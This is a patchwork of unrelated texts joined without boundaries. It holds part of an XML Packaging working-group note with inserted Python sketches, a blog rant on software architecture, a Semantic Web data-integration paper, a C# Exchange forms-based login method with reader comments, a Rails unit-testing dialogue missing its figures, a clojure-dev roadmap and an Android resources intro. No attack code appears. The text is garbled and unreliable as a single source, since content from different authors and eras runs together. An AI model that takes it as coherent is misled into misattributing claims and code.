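        data = produce()  # dynamically created content
        yield f"{name} {len(data)}\n".encode()
        yield data

def consume(chunks, handle):
    """Client side: call handle(name, data) for each Component
    as soon as it is complete, before the stream ends."""
    buf = b""
    for chunk in chunks:
        buf += chunk
        while b"\n" in buf:
            header, rest = buf.split(b"\n", 1)
            name, length = header.decode().rsplit(" ", 1)
            if len(rest) < int(length):
                break  # Component not complete yet; wait for more bytes
            handle(name, rest[:int(length)])
            buf = rest[int(length):]
```

Here `handle` fires as soon as each Component is complete, so display of the first Component can start while later ones are still being generated.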
For dynamically created documents the interesting thing is that, assuming the client has no reason to save the data to the file system, we have a communications transaction that is almost completely based on a file format, yet no explicit file ever exists. But the file format is vitally important, since it forms the basis for the communications between the client and server.
When transmitting a Collection of Components, some of them may be created on-the-fly and their sizes may be difficult or impossible to obtain when needed. In general, the APIs for server applications and extensions (such as CGI) do not provide adequate information for determining sizes, so short of buffering up the whole Component, there is no way to find out the size of a dynamically created Component. Once the size of one Component is not known, it is impossible to determine the starting byte for any subsequent Component. Hence it is not possible to generate an Index for a Package containing dynamically created Components on all systems. We therefore cannot require that an Index be generated when dynamic content creation is taking place.
While it is generally difficult or impossible for a server to pre-compute the sizes of all dynamically created Components of a Package, it is generally easy for a client to compute those sizes. This information is either intrinsic to the transfer protocol or readily available in the downloading and buffering mechanism.
All of the above supports the idea that the Index information for a Package can be optional. However, there are some very useful applications of XML Packaging for which a client should have a minimal burden of recomputation. If the transmission format, as a string of bytes, is EXACTLY what is stored as a file, including Index information, the receiver can employ normal file transfer software to file away a Package no matter how it is sourced. You can now mix and match server and client mechanisms in very arbitrary ways which greatly increases the flexibility and usefulness of the Package format. The objective therefore is to enable the general usage of XML Packaging without preventing very simple usages over simple file transfer protocols.
Even though the Index is optional, conforming implementations should support both indexed and indexless modes. An obvious consequence of implementation conformance is that the first thing a client should do is check the Package for an Index; if it doesn't have one, scan through the whole Package and reconstruct the Index. At the user's discretion, or as required, the client can rewrite a Collection or Package with the Index.
For picking a given Component out of a serial transmission of Components the simplest thing is to have Component boundaries within the serial transmission. There are two common ways to do this:
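One common technique, prefixing each Component with its length, can be sketched as follows (a toy format chosen for illustration, since the original list is not reproduced here; `scan` also shows how a client can rebuild Index entries from an index-less stream by a single pass):

```python
def frame(name, data):
    """Length-prefix one Component for serial transmission.

    A server can emit frames as Components are generated,
    without knowing the total Package size in advance."""
    header = f"{name} {len(data)}\n".encode()
    return header + data

def scan(stream):
    """Walk an index-less stream and reconstruct Index entries
    of (name, offset, length) -- the recovery step described above."""
    index, pos = [], 0
    while pos < len(stream):
        end = stream.index(b"\n", pos)
        name, length = stream[pos:end].decode().rsplit(" ", 1)
        body_start = end + 1
        index.append((name, body_start, int(length)))
        pos = body_start + int(length)
    return index
```

The reconstructed entries can then be written back out as a real Index, giving the Package random-access behaviour from that point on.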
The Manifest may still be useful, but some of the Manifest information may not be known until after all the files have been sent, while other Associations may be known ahead of time. If an incomplete Manifest is transmitted first, followed by the stylesheet and the XML file, display of the first XML file could begin while the rest of the files are still being received. If we wait until the end to send this Association information, display processing cannot begin until the whole Package has been sent. For the dynamically created Package case, a Manifest may be allowed anywhere in the Package. It needs to be decided whether subsequent Manifests add to the information from previous Manifests or supersede them.
Clients should be allowed to take subsets of the Package presented by a server, and servers should be allowed to send selected subsets to clients.
What is truly needed is real compression capability, so that binary data can be handled and honest compression delivered. It's essential that the compression and decompression method allow for processing as an in-stream filter, and the compression be done at or below the level of the packaging -- not by separately compressing an entire Package -- so as to retain the ability to randomly access a single file within the Collection independently. Files that are already compressed, such as JPEG files, should not be subjected to further compression when packaged. A server may be asked to transmit a Component from a Package over a slow communications line. If the file was compressed when packaged, it should be possible to unpackage it without decompressing it. This implies that each individual Component can have a compressed and/or uncompressed representation when standing alone.
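Per-Component compression of this kind can be sketched as follows (illustrative Python; the list of already-compressed file types is an assumption, not taken from the original):

```python
import zlib

# File types assumed to be pre-compressed (this list is illustrative).
ALREADY_COMPRESSED = {".jpg", ".jpeg", ".png", ".gz", ".zip"}

def pack_component(name, data):
    """Compress a Component individually, so it can later be
    extracted (still compressed) without touching its neighbours."""
    if any(name.endswith(ext) for ext in ALREADY_COMPRESSED):
        return ("stored", data)  # skip a useless second compression pass
    return ("deflated", zlib.compress(data))

def unpack_component(method, payload):
    """Reverse pack_component; 'stored' payloads pass through."""
    return payload if method == "stored" else zlib.decompress(payload)
```

Because each Component carries its own method and payload, a server can hand the still-compressed bytes straight to a client over a slow link, exactly the case described above.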
Given that a single file can be compressed by making it a one Component Package, that compressed/packaged file can participate with other files in yet another packaging of the whole set. Or in other words, one way to have a compressed form for any file is to have a trivial packaging of that single file. It is probably best to recognize such nesting within the standard and to be able to optimize processing by doing nested packaging and unpackaging in one operation.
There should be very few choices of compression technology, ideally one per family of related file types, to avoid the proliferation of variants of the XML Packaging specification. This makes the specification easier to implement, document and understand.
Zlib is a software library that implements the zlib/deflate compression method. The software is copyright Jean-loup Gailly and Mark Adler. It is freely available, free of patent issues and unencumbered by restrictions on commercial use.
Bzip2 is an up-and-coming, freely available, patent-free, high-quality data compressor.
Tests on large XML files show the following results:
Note that bzip2 averages 27.92% better compression than gzip.
Further research indicates that there is a broad range of compression percentages on small to medium-sized XML files. More research is needed in this area, as timing was not tested; it would be good to know for which file sizes it is faster to skip compression and decompression altogether and simply send the file in its normal state.
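The kind of measurement called for here can be reproduced with Python's standard library (the sample data is invented, and results will vary with file size and content):

```python
import bz2
import zlib

def compare(data):
    """Return compressed sizes for the two candidate methods."""
    return {"zlib": len(zlib.compress(data, 9)),
            "bz2": len(bz2.compress(data, 9))}

# Highly repetitive XML-like input, where both methods do well.
sample = b"<item><name>widget</name><qty>1</qty></item>" * 500
sizes = compare(sample)
```

On very small inputs the fixed header overhead of bzip2 can outweigh its better compression, which is exactly the size-dependent trade-off the paragraph asks about; timing both paths over a realistic corpus would answer the remaining question.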
It may seem strange that so much of the work on XML Packaging is on areas outside of the physical packaging mechanism. As has been demonstrated, the work of defining a Collection and Index that support random access, and of specifying Association metadata within a Manifest, together with support for dynamic creation, incremental processing and file compression, is separable from the actual packaging mechanism. But it is a very important part of the work of the working group: the mechanism chosen for physically packaging the Components will largely determine which of the features outlined above can be supported.
XML is an obvious candidate when considering a packaging mechanism. XML is simple; it should not take too long to design a mechanism that uses it, and it allows us to use a standard tool to do much of the work. Many have suggested XML as a packaging mechanism. Problems with XML:
ZIP is a widely used format for packaging information for transmission on the Web. Other packaging formats are based on ZIP, such as JAR (Java Archive) and CAB (Cabinet) files. The following paragraphs contain information on ZIP, including the ZIP file format specification and the source code for zip and unzip:
It is understood that as long as InfoZIP's copyright is left in place, the working group can do more or less as it pleases. It is also believed that nobody else has credible intellectual property claims to either the code or the algorithms that are used by ZIP.
A quote from InfoZIP says:
"In other words, use it with our blessings, but it's still our [InfoZIP's] code. Thank you!"
At least one publisher has implemented the Zip packaging technology for electronic distribution of book files. They have used a proprietary encryption scheme for component files, while leaving the Zip structure in the clear to get around the direct access to component files problem. Problems with ZIP:
MIME is also very well known and highly implemented. The ability to package groups of files into one file for internet transmission via the use of MIME is used by most mailers today. The following link cites over 24 different RFCs pertaining to MIME (caveat: Some of the links are broken, refer to for the truth).
Of particular interest are: "MIME Encapsulation of Aggregate Documents, such as HTML"
"MIME Multipart/Related Content-type"
"Content-ID and Message-ID Uniform Resource Locators"
There is also a mailing list that discusses the use of MIME and XML, the IETF-XML-MIME mailing list, and it can be found at:. Problems with MIME:
The group may choose to invent its own mechanism. This is not impossible. Its advantage is that the mechanism can be designed to do everything in the specification, without carrying the problems of a legacy system. Problems with creating a new mechanism:
A group should be chartered to look into XML Packaging and see whether most of the features described in this report can be supported. The new group needs to produce specifications that stimulate the development and widespread use of a highly interoperable XML Packaging Recommendation, for both general-purpose and application-specific XML Packaging needs. It is best that the group produce at least two interoperable implementations to demonstrate the effectiveness of the specification.
What is success? Is it the culmination of a project? Is it the application of requirements? Is it the ability to enjoy the outcome of one's work and build upon it in the future? If you ask me, it's the last one, because only when you can truly maintain and extend an application has the architecture been a real success.
Often, business will try to justify a lower-cost or simpler solution on the basis that a program has a fixed life expectancy and that the business clearly knows what they want. They argue that scope will never change, cost today is more important than cost tomorrow, and we have to get it done yesterday. I've seen many projects built under these assumptions and they all have one thing in common: failure.
More specifically
Projects that are run like this are done so purely for immediate political expediency; and when these failure points come up, they are always politically painful to fix.
So, what is Success Oriented Architecture? Simply, it's an architectural philosophy with the following tenets:
Let's look at these one-by-one.
KISS, otherwise known as Keep it Simple, Stupid, is the rallying cry of lazy programmers everywhere. Why write ten lines of code when you can cram it into five? Five lines of code must be simpler than ten lines of code and must also be easier to maintain, etc. We've all worked with these people. You may be one of these people. These people could not be more wrong. About the simplest thing in the world is the wheel, but even the wheel needs an axle to be useful. To keep the wheel on the axle you need a pin. To keep the pin in the axle you need to bend it. To carry things on the axle you need a container. To lift the container off the ground you need a lever. Soon, you have a cart which is decidedly more complex than a simple wheel. All we have to do to see that the wheel in its simplest state isn't useful is to simply look at this example. Are we cavemen or programmers? We need to be able to realize that too much simplicity sucks and that it really is necessary to include design elements that add robustness to an architecture.
Readable code makes it clear what code does, and how it's accomplished; discrete actions are clearly seen and ambiguity is avoided. Let's look at some very hard to maintain code:
1: public class test
2: {
3: public static void Main(string[] args)
4: {
5: Console.WriteLine(A.Calculate(B.InverseOf(C.MinValue(new D(args)))));
6: }
7: }
So, when you get a NullReferenceException on line 5, where are you going to find the bug? Can you even determine what variable is involved with the bug? Yet, in the name of "efficiency" or "simplicity" we see code like this all the time. Would we not be better serviced with code that fosters debugging and maintainability?
1: public class test
2: {
3: public static void Main(string[] args)
4: {
5: D d = new D(args);
6: var c = C.MinValue(d);
7: var b = B.InverseOf(c);
8: var a = A.Calculate(b);
9: Console.WriteLine(a);
10: }
11: }
Object Oriented Programming has three tenets: Encapsulation, Inheritance and Polymorphism. Each of these three individually allows you to create systems that are better than your standard bowl of C spaghetti, but it takes some planning to get the true value out of OOP; and that value is loose coupling.
Loosely coupled code is code that allows for changes to business rules, data format, and other strategic elements of a system to be changed or updated. The Strategy Pattern is a design pattern that specifically addresses this very concept. With loosely-coupled code, you can change your data access strategy, your logging strategy, etc by simply creating a new implementation of a well-defined interface and then changing the behavior of the application to use the new strategy's implementation. There are many good techniques for achieving loosely-coupled systems.
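As a concrete illustration of the Strategy Pattern described above (sketched in Python for brevity rather than C#; the class and method names are invented):

```python
class Logger:
    """The well-defined interface a logging strategy must satisfy."""
    def log(self, message):
        raise NotImplementedError

class ConsoleLogger(Logger):
    """One concrete strategy: write to standard output."""
    def log(self, message):
        print(message)

class MemoryLogger(Logger):
    """A second strategy, handy in tests."""
    def __init__(self):
        self.lines = []
    def log(self, message):
        self.lines.append(message)

class OrderService:
    """Depends only on the Logger interface, never on a concrete
    strategy -- swapping implementations requires no change here."""
    def __init__(self, logger):
        self.logger = logger
    def place_order(self, item):
        self.logger.log(f"ordered {item}")
        return True
```

Swapping `ConsoleLogger` for `MemoryLogger`, or for a hypothetical database-backed logger, changes the application's behavior without touching `OrderService` at all, which is the loose coupling the paragraph describes.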
For years it was popular to create client-server applications where a GUI loaded with business rules was tightly integrated with even more business rules living inside the stored procedures of a proprietary database. There was little, if any, separation of duties between presentation, business logic, and persistence. It only took a few years in the 90's for companies to realize this was a pretty bad idea. Next came the great Internet craze, which led to the replacement of client-server applications with web applications: basically a GUI with a bunch of tightly integrated scripting code residing in templating engines that talked to a bunch of business-rule-laden stored procedures. If anything, we actually took a step backwards from client-server with this model, because now we had the same horrible coding practices combined with a stateless interface that compounded every one of the problems created by client-server. Yet it was the web, thus it had to be better, right? Well, websites grew, databases became overloaded, templating engines buckled and systems broke with glorious regularity and public humiliation. Now, when your crappy client-server architecture hiding behind HTML was exposed to the public, the whole world could see the results.
This was when people started paying attention to the concept of n-Tier development. It was obvious that loading up a templating engine with a bunch of business rules was a bad idea; but ask most DBAs and they'll tell you (wrongly) that it's perfectly OK to stick a bunch of business rules inside of stored procedures. After all, Oracle wouldn't provide stored procedures if they weren't the perfect place to put business rules, right? Overnight we abandoned ASP and CGI for JSP and ASP.NET. We moved business rules out of our HTML generators and placed them in shared libraries that happen to execute in the webserver. Was it faster? Yes, it was, and it often increased the amount of traffic that a website could handle by a factor of ten; but it was still brittle. All of that fast-moving webserver code now overloaded the database, which was burdened not just with the demands of fetching data, performing sorts, indexing new data, and so on, but also with processing those business rules that the DBAs insisted needed to be in the RDBMS. Business then started pulling business rules out of stored procedures and into libraries of compiled code on the webserver, which upset the natural balance once again. Now the webserver was tightly coupled to its business rules, which were tightly coupled to their data rules, which were still tightly coupled to the database. Will the madness ever end?
Yes; and thank goodness it did. By the early 2000's it became clear that the real solution for business systems that could succeed over long life-cycles was to create systems that can be scaled not only vertically, by adding more strategic features, but horizontally as well, by adding redundant processing capability. Distributed computing was not new, but good techniques for it were. The advent of web services led to the liberation of the enterprise application from the domain of a few web-jockeys and DBAs into the realistic world of team development with real standards, contracts, and *gasp* design documentation. Now we can separate business rules from persistence and presentation. We can run these separated layers on a diverse set of hardware that allows the best technology to be used for each specific aspect of the system. We have destroyed the brittle barriers that placed roadblocks between our needs and our success.
While there have been complaints within Web circles of too many standards being produced, and not enough clarity of vision between them, we feel that the addition of rules to the Semantic Web provides a remarkable opportunity for tying together XML, RDF and OWL, and Web Services on coherent and sound principles. The goal is to solve the long-standing problem of data integration on the Web.
As more and more information on the Web is given in the form of XML, developers of Web rules should note the reason why XML has proven popular: simply, the transmission of semi-structured data, with schema languages providing interoperability and XSLT allowing conversion between XML formats. However, while XML provides excellent serialization syntax, the grand challenge of data integration has yet to be met. Many industries have not developed schemas to simplify data exchange, and often data exchange will involve combining data from heterogeneous sources without shared schemas, or with schemas that have no explicit mappings. Little progress has been made on data integration because of the sheer difficulty of the problem of intentional equivalence: when are two pieces of data about the same thing, such that one would use owl:equivalentClass, owl:equivalentProperty, or owl:sameAs? There is also a lack of standards to enable detection of equivalence for integration. Allowing data to be accessed by URIs makes the information Web-accessible, but this is only the first step of data integration.
Ideally, one could have a set of rules that identify whether two things are intentionally equivalent. For example, except in pathological cases, in the United States if two people share the same Social Security Number, they are the same person, and the Social Security Number can be taken to be an owl:InverseFunctionalProperty. However, most data will not have such an easily identified owl:InverseFunctionalProperty. Instead, heuristics in the form of rules will have to be developed to show equivalence.
For example, a person's name is not generally considered to be an inverse functional property, since many people share the same name. Likewise, an address may have more than one person at it. However, the combination of a shared name and a shared address by two individuals is likely to mean that those are the same person. It is even more likely if the same birthday is shared. Lastly, these rules may trigger new information, such as that the address is capable of having mail sent to it, or even the sending of said mail automatically.
While there has been work on providing a common model theory for the XQuery Data Model and OWL/RDF [1], there has been little work on the problem of integration. First, one must be able to bind arbitrary XML to RDF and OWL classes. This can easily be done through XML Schema annotations [2], which allow arbitrary XML data to be modeled in the PSVI with user-specified OWL/RDF data. Note that this methodology on some level allows interoperability of arbitrary XML data with logical languages such as Prolog [3]. Using this technique, XML data can be marshalled into existing OWL/RDF databases. Yet the integration will be poor indeed unless one can discover when two different URIs are about the same thing.
For example, let us assume we have a knowledge base as given by the following TBox. This allows us to distinguish URIs about people from URIs about other things, and give people addresses, birthdays, and names. Only fragments of the ontologies and XML are given to conserve space.
<owl:Class rdf: </owl:Class>
<owl:Class rdf:
  <rdfs:subClassOf rdf:
</owl:Class>
<owl:Class rdf:
<owl:DatatypeProperty rdf: ....

Then we have this information as given by our ABox:
<!-- ABox -->
<census:Woman rdf:
  <census:hasName>Alice Smith</census:hasName>
</census:Woman>
<census:Man rdf:
  <census:hasName>Robert Smith</census:hasName>
  <census:hasAddress>
    <census:streetValue>8 Oak Avenue</census:streetValue>
    <census:cityValue>Old Town</census:cityValue>
    <census:stateValue>PA</census:stateValue>
    <census:zipValue>95819</census:zipValue>
    <census:countryValue>US</census:countryValue>
  </census:hasAddress>
  <census:hasBirthday>1971-10-10T12:00:00-05:00</census:hasBirthday>
</census:Man>
....
New XML information comes into our knowledge base in XML form:

<> ....

This XML can then be marshalled into OWL using Schema annotations or a custom-made XSLT stylesheet, and the results integrated:
<census:Woman rdf:
  <census:hasName>Alice Smith</census:hasName>
  <census:hasAddress rdf:
</census:Woman>
<census:Woman rdf:
  <census:hasName>Alice Smith</census:hasName>
</census:Woman>
<census:Man rdf:
  <census:hasName>Robert Smith</census:hasName>
  <census:hasAddress rdf:
  <census:hasBirthday>1971-10-10T12:00:00-05:00</census:hasBirthday>
</census:Man>
<census:Address rdf:
  <census:streetValue>123 Maple Street</census:streetValue>
  <census:cityValue>Mill Valley</census:cityValue>
  <census:stateValue>CA</census:stateValue>
  <census:zipCodeValue>90952</census:zipCodeValue>
  <census:countryValue>US</census:countryValue>
</census:Address>
<census:Address rdf:
  <census:streetValue>8 Oak Avenue</census:streetValue>
  <census:cityValue>Old Town</census:cityValue>
  <census:stateValue>PA</census:stateValue>
  <census:zipValue>95819</census:zipValue>
  <census:countryValue>US</census:countryValue>
</census:Address>
....
Note that Alice Smith in the incoming XML document, since she only shares the same name as the Alice Smith denoted by the URI (given some default base namespace) "ASmith202-73-4598," is given a separate URI "genID:762" in the newly integrated knowledge base. However, because the Robert Smith denoted by the URI "RSmith786-36-721" shares the same name and address as the Robert Smith in the incoming XML document, the knowledge bases are merged and we now know Robert Smith's birthday (assuming our rule is correct). A rule should be able to express data integration of this style in a succinct manner.
In summary, we need a rule language able to merge the databases in a way such as described. These rules would ideally be easy to read and write, and given URIs such that they can be associated with data either explicitly in XML or RDF, or through the Post-Schema-Validation Infoset. The rules should be ordered, such that the first rule looks for matching Social Security Numbers. If that fails, it should look for matching birthdays, names, and addresses; and if that fails, back-track and look for matching names and addresses to determine equivalence. Perhaps another back-tracking step could look for name equivalence alone. Regardless, any language based on back-tracking and a Horn clause formalism should be able to perform this functionality.
However, this avoids the obvious point: it is more reliable to have two resources judged identical by an inverse functional property like a Social Security Number than by the combination of two non-inverse-functional properties such as name and address. The combination of a birthday, name, and address should be judged more reliable than just a name and address: Harry Halpin Junior could move into his father's house and not specify his epithet or his birthday in an order form. To deal with these levels of inference, either the rules need to be solidified to perfection, or work on the Web of Trust needs to be integrated into rules, so that certain rules can be trusted to be correct more than others. This could be formalized as probabilities, such that the combination of a name, address, and birthday is deemed more likely to solve the equivalence problem (an example probability of .8) than the combination of just a name and address (an example probability of .6), or than just sharing the same name (a probability of .1). The probabilities could possibly be encoded as levels of trust. Related work has been done on probabilistic logical programming languages [4].
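The ordered, probability-weighted heuristics proposed here can be sketched as follows (illustrative Python; the record shapes and confidence values are invented, mirroring the examples above):

```python
# Ordered heuristics: the most reliable rule is tried first, with
# weaker rules as fallbacks. Confidence values are illustrative only.
RULES = [
    (lambda a, b: bool(a.get("ssn")) and a.get("ssn") == b.get("ssn"), 0.99),
    (lambda a, b: all(a.get(k) and a.get(k) == b.get(k)
                      for k in ("name", "address", "birthday")), 0.8),
    (lambda a, b: all(a.get(k) and a.get(k) == b.get(k)
                      for k in ("name", "address")), 0.6),
    (lambda a, b: bool(a.get("name")) and a.get("name") == b.get("name"), 0.1),
]

def same_person(a, b):
    """Return the confidence of the first rule that matches,
    falling back through weaker rules, else 0.0."""
    for rule, confidence in RULES:
        if rule(a, b):
            return confidence
    return 0.0
```

A merge would then proceed only above some confidence threshold, which is why the incoming Alice Smith (a name match only) would get a fresh URI while Robert Smith's records would be merged.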
At its current state the Semantic Web is a specification language, while many people want to do things with data on the Web, not just specify the types of data. The Semantic Web rule effort is clearly a move in this direction, and yet if it develops as an entirely divorced specification from Web Services and XML it may have difficulty being adopted outside the existing Semantic Web community. The question of how the Semantic Web may be bound to XML data must be addressed, and then if Semantic Web rules can be shown to help solve the data integration problem, it will likely be a crucial victory for the entire Semantic Web, showing how XML and the Semantic Web are complementary and leading to adoption of the Semantic Web by more XML users.
It is almost obvious that regardless of syntax, Web Rules are going to be based on some sort of logical programming language like Prolog, but with Web extensions such as specified by the Rule Markup Language and others. However, Web Services are more and more being united under the framework of functional programming, and current XML programming languages such as XSLT and XQuery are functional languages. In order to simplify standards, it would be useful to see how functional and logical programming languages can be combined. There has been considerable work on functional programming languages that combine both functional and logical aspects, such as the Curry language [5]. Ideally, functional aspects could be used for Web Service composition and general data manipulation, while the logical aspects could be used for data integration. In return, developers of Web Services and the Semantic Web could use a single unified framework for Web programming. The current three-tier approach to data on the Web (scripting language accessing databases that display results in HTML) could be replaced by a more powerful approach that uses a Web-scale logical functional language to employ distributed OWL/RDF databases for both human and machine consumption.
First, let's see the namespaces I used in my code to get the FBA stuff working.
using System.Text;
using System.Net;
using System.Security.Authentication;
using System.Web;
And here is the authentication method, which returns session cookies if authentication succeeds. You can use these cookies if you have to execute WebDAV queries, for example.
private CookieCollection DoExchangeFBA(string server, string userName, string password)
{
    var uri = server + "/exchweb/bin/auth/owaauth.dll";
    var request = (HttpWebRequest)HttpWebRequest.Create(uri);
    request.Method = "POST";
    request.CookieContainer = new CookieContainer();
    request.ContentType = "application/x-www-form-urlencoded";
    request.AllowAutoRedirect = false;
    request.ServicePoint.Expect100Continue = false;

    // The form values must be URL-encoded before being written to the body.
    server = HttpUtility.UrlEncode(server);
    userName = HttpUtility.UrlEncode(userName);
    password = HttpUtility.UrlEncode(password);

    var bodyString = "destination={0}&flags=0&username={1}";
    bodyString += "&password={2}&SubmitCreds=Log+On&";
    bodyString += "forcedownlevel=0&trusted=0";
    bodyString = string.Format(bodyString, server, userName, password);

    var body = Encoding.ASCII.GetBytes(bodyString);
    request.ContentLength = body.Length;
    ServicePointManager.Expect100Continue = false;

    var stream = request.GetRequestStream();
    stream.Write(body, 0, body.Length);
    stream.Close();

    // A successful forms-based login sets (at least) two cookies.
    var response = (HttpWebResponse)request.GetResponse();
    if (response.Cookies.Count < 2)
        throw new AuthenticationException("Failed to login to OWA!");
    return response.Cookies;
}
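For readers outside .NET, the part that is easiest to get wrong is the shape of the URL-encoded form body that owaauth.dll expects. Here is a rough plain-Java sketch of just that body-building step. The field names come from the C# code above; the server name and credentials used below are placeholders, and actually posting the body and harvesting cookies is left out:

```java
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;

// Sketch: builds the same owaauth.dll form body as the C# code above.
class OwaFormBody {
    static String enc(String s) {
        try {
            return URLEncoder.encode(s, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            throw new RuntimeException(e); // UTF-8 is always available
        }
    }

    static String build(String server, String userName, String password) {
        // Same field order and values as the C# bodyString above.
        return "destination=" + enc(server)
                + "&flags=0"
                + "&username=" + enc(userName)
                + "&password=" + enc(password)
                + "&SubmitCreds=Log+On"
                + "&forcedownlevel=0&trusted=0";
    }
}
```

For example, `OwaFormBody.build("https://mail.example.com", "domain\\user", "secret")` produces a body where the backslash and URL separators are percent-encoded, which is exactly what the DLL expects.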
If you are using Exchange Server 2007, the authentication address is different and you get back only one cookie.
Hi Gunnar,
Thanks for the post, I've tried your code (and some similar code I've written) but just get a 400 bad request back from the server when I try to make use of the cookieCollection:
Request.CookieContainer.Add(DoExchangeFBA("https://" + mailboxServer, "nwtraders\\dave hope", "Password"));
The raw http request looks like the following:
Content-Length: 141
Expect: 100-continue
<?xml version="1.0"?><a:propfind xmlns:<a:prop><d:oof-state/></a:prop></a:propfind>
Any ideas as to where I'm going wrong?
Thanks,
Dave
I have seen this error in a rather weird situation. I wrote a command line application that imports calendar data from Exchange to SharePoint. Everything worked fine. Then I decided to create a SharePoint server timer job based on this code. Without any notable modifications, this code is not able to work under the SharePoint timer process. After authentication it always gets error 400 bad request.
Can you tell me more about your technical environment? Maybe it is possible to find out what is going on.
Thanks for the response!
We have multiple exchange servers. The code works fine against those which use Negotiate authentication but not those using FBA.
The code fails when making the request from the exchange servers itself. It's Exchange 2003 with all updates applied running on Windows 2k3 SP2 (again, with all updates applied).
Is there any specific information I can provide?
Thanks!
Problem solved! - I was doing two things wrong:
Not specifying the content-type in my request:
Request.ContentType = "text/xml";
The FBA login was redirecting, which I shouldn't have followed. Doing the following fixed it:
request.AllowAutoRedirect = false;
Thanks
Very good stuff! Do you have the same for Exchange 2007?
Best regards
Thor
Hello Thor!
Basically you can use this code with Exchange 2007 as well, but you have to make some small changes.
1. Exchange 2007 has a different URL for the authentication DLL.
2. There is only one authentication cookie for Exchange 2007.
Hi,
This solution works fine. However, we need to give the password in this case. When we are using default credentials, can it be done without a password?
Thank you for posting this code. Are you able to offer me an example of how I might use your code to prevent the OWA login screen from appearing when a user clicks on a link to an inbox item? I am initially authenticating (successfully), passing a webDAV query, and returning & displaying the results on an .aspx (2.0) page. Within the results I have created anchor tags hyperlinked (using the exchange protocol format) to inbox items. However, when a user clicks on the item, the OWA login screen comes up. Specifically, how can I implement your code to bypass this screen?
Thank you,
Erik Snyder
If you want it to be done easily then use Windows authentication; the browser takes care of everything. Otherwise... try to put these session cookies into the user's browser and see what happens.
Thanks for posting the code. But when trying to get the cookies we are getting a 401 Unauthorized error. Could you please let me know what could be the reason for the 401 Unauthorized error?
Thank You,
KVL
Figure 21
And now let's make sure that our new teardown method has cleared out the database.
Figure 24
And then take another look...
Figure 26
CB: There we go. Now that the recipes table is empty, let's run our category test again.
ruby test\unit\category_test.rb
Figure 27
Paul: That's more like it. But, and don't take this wrong CB, but that's really not what I'd call a complete test. It seems to me like we need to check a couple more things. First, Rails is telling us it changed "beverages" to "beverage" but we haven't checked to see if there's actually a record in the table named "beverage." And we haven't checked to make sure that there's not a record named "beverages" any more.
CB: I knew you'd be good in the tester role, Paul ;-) You're right. Let's add those tests. So now our test method looks like:
def test_read_and_update
  rec_retrieved = Category.find_by_name("beverages")
  assert_not_nil rec_retrieved
  rec_retrieved.name = "beverage"
  assert rec_retrieved.save
  changed_rec = Category.find_by_name("beverage")
  assert_not_nil changed_rec
  unwanted_rec = Category.find_by_name("beverages")
  assert_nil unwanted_rec
end
So now when we run category_test.rb, we get
Figure 28
CB: So, we're sure that we can read and update records that are already in the table. Let's make sure we can create and delete records.
Paul: But haven't we already proved that with the fixtures setting up the table and the teardown method clearing it out?
CB: That's a good question, Paul. I think you can argue it both ways.
On one hand, we've definitely shown with the read_and_update method that the database got loaded, otherwise there'd be nothing to read and update. And we took a peek at the table itself after running the recipe test and saw that the table had been emptied.
On the other hand, there are a couple of things that make me, personally, choose to go ahead and write a couple more methods to test the create and delete capabilities explicitly. First, I look to my test cases to tell me what an app does. If I don't put in methods to test the create and delete functionality, then I have to remember that the app does that but that it's being tested some other way. I guess I'm getting to an age where I'm less apt to trust my memory ;-) Second, my unit tests are testing the Model and I want to see that happen. If you look at the fixture files, you don't see any explicit use of Models per se. So if I've got a lot of trust in my memory, and I trust that Rails itself is working properly, I could argue the additional tests aren't really necessary. But when I've got on my Tester hat, my SOP is "show me," not "trust me."
It's not much work and it's not going to add significantly to our test execution time. So, I'm going to go ahead and add the methods to category_test.rb. Actually, I think I'll combine them like we did for read and update.
def test_create_and_destroy
  initial_rec_count = Category.count
  new_rec = Category.new
  new_rec.save
  assert_equal(initial_rec_count + 1, Category.count)
  new_rec.destroy
  assert_equal(initial_rec_count, Category.count)
end
And then we rerun our test case, and...
Figure 29
CB: So now we're sure that, as it stands, our tests make us confident that our Category model is working as designed. Now let's do the same for our Recipe model. Open recipe_test.rb and replace the test_truth method with:
def test_create_and_destroy
  initial_rec_count = Recipe.count
  new_rec = Recipe.new
  new_rec.category_id = 1
  new_rec.save
  assert_equal(initial_rec_count + 1, Recipe.count)
  new_rec.destroy
  assert_equal(initial_rec_count, Recipe.count)
end
And now we run the recipe test case...
Figure 30
And it looks like we've got the basics working there too. What do you think, Paul?
Paul: Pretty good so far, CB. Are we ready to start filling those holes we spotted?
CB: You bet. Let's use our tests to put a spotlight on them. The approach I'm hoping you'll help me introduce to Boss says it's best to put off writing application code until you have a failing test that demands it. Let's start with the Category model. In Rails, we use our Unit tests to make sure the Model is working properly. "Properly" means, at a minimum, the CRUD functionality that's at the core of pretty much all Rails apps. That's what we just wrote tests for. The next piece of "properly" means that the validations we need our application to do on the data being written to the database are working. And finally, we need to make sure that any methods we include in our Model are working.
We've decided that all our Category records have to have a name and that the length of the name can't be longer than 100 characters. And we've already seen that we're not currently enforcing that rule. Even if I hadn't given the name field a default value of an empty string, the way it sits right now, a visitor could hit the space bar and effectively do the same thing. So I'd say we're probably going to need to use both validations and a method to check for visitors entering blanks for the name. But let's let the tests tell us what we need.
So let's add another method to our category test case to make sure we only save records that have a valid name. First we'll try to save a record with no name and expect that save to fail, then we'll try to save a record that does have a name and expect it to get saved.
def test_must_have_a_valid_name
  rec_with_no_name = Category.new
  assert_equal(false, rec_with_no_name.save)
  rec_with_name = Category.new(:name => "something new")
  assert rec_with_name.save
end
And now lets run it.
ruby test\unit\category_test.rb
Figure 31
And we'll change the assertions in the test_must_have_a_valid_name and test_long_names methods, so our category test case looks like ...
Figure 38
And we run our tests again to make sure we get the same results...
Figure 39
Bill Walton is a software development/project management consultant/contractor.
clojure-dev is an integrated development environment (IDE) for the Clojure programming language, built on the Eclipse platform.
Installing it and starting to test and develop in Clojure takes just a matter of minutes!
NEW RELEASE 0.0.34 (as of 2009/05/11) (see this announcement for details)
Quick links
Coarse grained roadmap
(in bold features already implemented)
- Source code editing:
- syntax coloring, rainbow parens
- interaction with the REPL
- auto-indentation
- Formatting
- Navigation
- a minimum of JDT integration
- Code completion with source/java doc (first pass)
- REPL
- namespace browser
- navigate the tree of currently loaded libs
- symbol name/docstring based search feature
- syntax coloring
- code completion
- JDT integration
- auto-build feature coupled with the active REPL
Resources are external files (that is, non-code files) that are used by your code and compiled into your application at build time. Android supports a number of different kinds of resource files, including XML, PNG, and JPEG files. The XML files have very different formats depending on what they describe. This document describes what kinds of files are supported, and the syntax or format of each.
